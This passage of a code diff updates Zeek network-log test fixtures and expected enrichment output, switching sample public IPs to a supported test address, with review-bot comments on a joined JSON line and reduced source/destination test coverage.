Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224} -{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"46.101.87.151","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false} -{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"35.195.125.46","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"35.198.74.222","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"35.198.74.222","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false} -{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"104.154.89.105","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"} 
-{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"35.195.125.46","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} \ No newline at end of file +{"ts":1547688736.805088,"uid":"CAOvs1BMFCX2Eh0Y3","id.orig_h":"10.178.98.102","id.orig_p":63199,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FebkbHWVCV8rEEEne","F4BDY41MGUBT6URZMd","FWlfEfiHVkv8evDL3"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} +{"ts":1547688736.80509,"uid":"C3mki91FnnNtm0u1ok","id.orig_h":"10.178.98.102","id.orig_p":63198,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["Fue9H32OmuitQk2zR","FpbiBP215tk2xftxM6","FEdROj1vUzTGw3BIUa"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"} 
+{"ts":1547688736.805527,"uid":"CfGBt82PzCXzHa0iek","id.orig_h":"10.178.98.102","id.orig_p":63197,"id.resp_h":"89.160.20.156","id.resp_p":9243,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","curve":"secp256r1","server_name":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","resumed":false,"established":true,"cert_chain_fuids":["FiFLYv3UjeWyv2gcW","FvSsiB1Xi816EMagI9","FWpPS4mjGaAhTRXLf"],"client_cert_chain_fuids":[],"subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","validation_status":"ok"}{"ts":1602179457.352156,"uid":"CK17Dl2SB8bZOVonSl","id.orig_h":"10.0.0.1","id.orig_p":49228,"id.resp_h":"192.168.50.1","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA256","resumed":false,"established":true,"cert_chain_fuids":["FOLwYQ6rs70bIMSf9"],"client_cert_chain_fuids":[],"subject":"CN=foo,OU=foo@bar,O=org,L=locality,C=LO","issuer":"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI","validation_status":"self signed certificate","ja3":"74927e242d6c3febf8cb9cab10a7f889","ja3s":"80b3a14bccc8598a1f3bbe83e71f735f","resp_certificate_sha1":"5dad8b55621b6b9c30679d9d61248dd132a83c94","not_valid_before":1562022421,"not_valid_after":1577748224} +{"ts":1617091251.151303,"uid":"CLQiVH1VcpvT3ruEak","id.orig_h":"10.156.0.2","id.orig_p":52730,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","resumed":false,"established":false} +{"ts":1617090955.826099,"uid":"CBiXOC4IqYxMv1xzf9","id.orig_h":"89.160.20.156","id.orig_p":52678,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false} +{"ts":1617091253.726384,"uid":"C4jH9IqWGZwc1PPUh","id.orig_h":"89.160.20.156","id.orig_p":53368,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"tickets.swiftcrypto.com","resumed":false,"established":false} 
+{"ts":1617091253.91861,"uid":"CXVMSq6Dainy4WFN9","id.orig_h":"89.160.20.156","id.orig_p":53382,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"rundeck.swiftcrypto.com","resumed":false,"established":false}
+{"ts":1617091254.325291,"uid":"CsgtQe4AikDZBsIM6k","id.orig_h":"10.156.0.2","id.orig_p":55120,"id.resp_h":"89.160.20.156","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["FeyRIk4nUtwwcUcnRf"],"client_cert_chain_fuids":[],"validation_status":"self signed certificate"}
+{"ts":1617091255.065602,"uid":"CPGhJS3UPpcnR96NQc","id.orig_h":"89.160.20.156","id.orig_p":53095,"id.resp_h":"10.156.0.2","id.resp_p":443,"server_name":"splunk-api.swiftcrypto.com","resumed":false,"established":false}
\ No newline at end of file
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log b/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log
index b3595d55a6b..61a9323a0e2 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/traceroute.log
@@ -1 +1 @@
-{"ts":1361916158.650605,"src":"192.168.1.1","dst":"8.8.8.8","proto":"udp"}
+{"ts":1361916158.650605,"src":"192.168.1.1","dst":"89.160.20.156","proto":"udp"}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log b/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log
index 139a6591c75..f535a3eaa6e 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/tunnel.log
@@ -1 +1 @@
-{"ts":1544405666.743509,"id.orig_h":"132.16.146.79","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"}
+{"ts":1544405666.743509,"id.orig_h":"89.160.20.156","id.orig_p":0,"id.resp_h":"89.160.20.156","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"}
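Review bot: On the new side of the ssl.log hunk the third rewritten record and the fourth run together on one line — `"validation_status":"ok"}{"ts":1602179457.352156,...` — with no newline, space or diff marker between them, and the same join is visible on the old side, so the PR rewrites that line without fixing it. These sample logs are consumed as one JSON object per line, so a line-oriented reader will either reject that line as malformed JSON or keep only the first object, meaning the self-signed-certificate sample (the one carrying `ja3`, `ja3s` and `resp_certificate_sha1`) is probably never ingested by the docker system test that this file feeds. This could be an artifact of how the diff was rendered here, but every other record boundary in the file shows a separator, so it looks like a real defect in the fixture; splitting it into two lines while the line is already being edited would fix it. The file also still ends without a trailing newline (`\ No newline at end of file` on both sides), which some line readers treat as an incomplete last record.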
diff --git a/packages/zeek/changelog.yml b/packages/zeek/changelog.yml index a1b28b52246..e7d52685ec9 100644 --- a/packages/zeek/changelog.yml +++ b/packages/zeek/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.5.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json index f698f3305d7..03e30262e58 100644 --- a/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json +++ b/packages/zeek/data_stream/capture_loss/_dev/test/pipeline/test-capture-loss.log-expected.json @@ -15,7 +15,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911369200Z", + "ingested": "2021-12-09T13:50:56.071408600Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -40,7 +40,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911387100Z", + "ingested": "2021-12-09T13:50:56.071411900Z", "original": "{\"ts\":1617062640.941952,\"ts_delta\":900.0005369186401,\"peer\":\"zeek\",\"gaps\":58475,\"acks\":65665,\"percent_lost\":89.05048351481003}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911395500Z", + "ingested": "2021-12-09T13:50:56.071417300Z", "original": "{\"ts\":1617063540.942231,\"ts_delta\":900.0002789497376,\"peer\":\"zeek\",\"gaps\":54754,\"acks\":61818,\"percent_lost\":88.5729075673752}", "type": "info", "created": "2020-04-28T11:07:58.223Z", 
@@ -90,7 +90,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911403100Z", + "ingested": "2021-12-09T13:50:56.071422800Z", "original": "{\"ts\":1617064440.942597,\"ts_delta\":900.0003659725189,\"peer\":\"zeek\",\"gaps\":51022,\"acks\":57974,\"percent_lost\":88.00841756649533}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -115,7 +115,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911410700Z", + "ingested": "2021-12-09T13:50:56.071427300Z", "original": "{\"ts\":1617065340.942651,\"ts_delta\":900.0000541210175,\"peer\":\"zeek\",\"gaps\":55105,\"acks\":62497,\"percent_lost\":88.17223226714883}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -148,7 +148,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:20.911418400Z", + "ingested": "2021-12-09T13:50:56.071431100Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log index b652a425954..73bf06d9817 100644 --- a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log +++ b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log 
@@ -1,11 +1,11 @@
 {"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"4.4.2.2","id.orig_p":38334,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.0.2.205","id.orig_p":3,"id.resp_h":"198.51.100.249","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]}
-{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"46.101.87.151","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
-{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
-{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
-{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
+{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"89.160.20.156","id.orig_p":38334,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.168.2.205","id.orig_p":3,"id.resp_h":"89.160.20.156","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]}
+{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
+{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
+{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
+{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
 {"ts":1617062390.563187,"uid":"CezEGe4jeLNkayV976","id.orig_h":"10.156.0.2","id.orig_p":38948,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.02680206298828125,"orig_bytes":0,"resp_bytes":241,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":269}
 {"ts":1617062390.563442,"uid":"CKSr3w18mmW6t7bXC4","id.orig_h":"10.156.0.2","id.orig_p":40080,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.025056123733520509,"orig_bytes":0,"resp_bytes":276,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":304}
 {"ts":1617062390.667048,"uid":"CGUiHy4kLIF2ml95eg","id.orig_h":"10.156.0.2","id.orig_p":41407,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.003319978713989258,"orig_bytes":0,"resp_bytes":133,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":161}
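Review bot: The rewritten record for uid CAcJw21BbVedgFnYH5 now carries `"id.orig_h":"89.160.20.156"` and `"id.resp_h":"89.160.20.156"`, so source and destination enrich to the same geo/AS entry and the expected `related.ip` collapses to a single value; the fixture can no longer detect a source/destination enrichment swap, which the previous distinct pair could. Keeping one endpoint on a different address from the supported subset (e.g. `"id.orig_h":"<second supported test IP>"`) would preserve that coverage. The Splunk-wrapped `_raw` copy of the same record in the next hunk (`@@ -14,5 +14,5 @@`) has the same pairing and would need the matching change. The ICMP record now combines a private `192.168.2.205` originator with `"local_orig":false`; it appears to be passed through as-is, but it reads oddly for a fixture and is worth a short note in the file or PR.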
@@ -14,5 +14,5 @@
 {"ts":1617062400.703865,"uid":"C3pPjh1YRYcVDiZD3","id.orig_h":"10.156.0.2","id.orig_p":44944,"id.resp_h":"169.254.169.254","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
 {"ts":1617062400.703851,"uid":"ChUxTmYLG37oO5qUb","id.orig_h":"10.156.0.2","id.orig_p":44942,"id.resp_h":"169.254.169.254","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
 {"ts":1617062400.704467,"uid":"CpeAOT3B11CTXJgzw2","id.orig_h":"10.156.0.2","id.orig_p":44946,"id.resp_h":"169.254.169.254","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"4.4.2.2\",\"id.orig_p\":38334,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/httpd/access_log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
-{"ts":"2021-06-09T20:55:13.160328Z","uid":"C2KP1V3alRLoxl4JB9","id.orig_h":"10.0.2.15","id.orig_p":46408,"id.resp_h":"172.217.9.68","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
\ No newline at end of file
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/httpd/access_log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":"2021-06-09T20:55:13.160328Z","uid":"C2KP1V3alRLoxl4JB9","id.orig_h":"10.0.2.15","id.orig_p":46408,"id.resp_h":"172.16.9.68","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
\ No newline at end of file
diff --git a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json
index 1195f70d968..90dda5010a4 100644
--- a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json
+++ b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json
@@ -38,7 +38,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253067515Z", + "ingested": "2021-12-09T13:50:56.388703500Z", "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":true,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -72,29 +72,32 @@ "related": { "ip": [ "192.168.86.167", - "8.8.8.8" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", + "address": "89.160.20.156", "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "89.160.20.156", "packets": 1 }, "zeek": { 
@@ -117,8 +120,8 @@ }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253113730Z", - "original": "{\"ts\":1547188416.857497,\"uid\":\"CAcJw21BbVedgFnYH4\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38340,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388712400Z", + "original": "{\"ts\":1547188416.857497,\"uid\":\"CAcJw21BbVedgFnYH4\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38340,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAcJw21BbVedgFnYH4", @@ -136,7 +139,7 @@ ], "network": { "protocol": "dns", - "community_id": "1:77KJyeznYjdDxCSKdZhW89aAaBI=", + "community_id": "1:/gtb8GnyAm+VWWDzXIdu6DL11Ao=", "transport": "udp", "bytes": 309, "packets": 2, 
@@ -150,30 +153,32 @@ }, "related": { "ip": [ - "4.4.2.2", - "8.8.8.8" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", + "address": "89.160.20.156", "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "89.160.20.156", "packets": 1 }, "zeek": { 
